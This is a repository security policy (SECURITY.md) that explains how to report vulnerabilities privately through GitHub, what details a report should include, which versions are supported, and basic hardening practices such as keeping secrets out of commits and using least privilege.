Please do not report security vulnerabilities through public GitHub issues.
Instead, please use GitHub's private vulnerability reporting:
- Go to the Security tab of this repository
- Click "Report a vulnerability"
- Fill out the form with details
I will respond within 48 hours and work with you to understand and address the issue.
- Type of issue (e.g., XSS, command injection, secret exposure)
- Full paths of affected source files
- Step-by-step instructions to reproduce
- Proof-of-concept or exploit code, if possible
- Impact assessment and potential attack scenarios
Only the latest version receives security updates. Please always use the most recent release.
- Never commit secrets. Use Kubernetes Secrets, External Secrets, or CI secrets.
- Validate user-provided values in templates and workflow inputs.
- Keep dependencies updated. Dependabot is enabled on this repo.
- Prefer least privilege in containers, RBAC, and GitHub workflows.
For security questions that aren't vulnerabilities, open a regular issue or start a GitHub Discussion.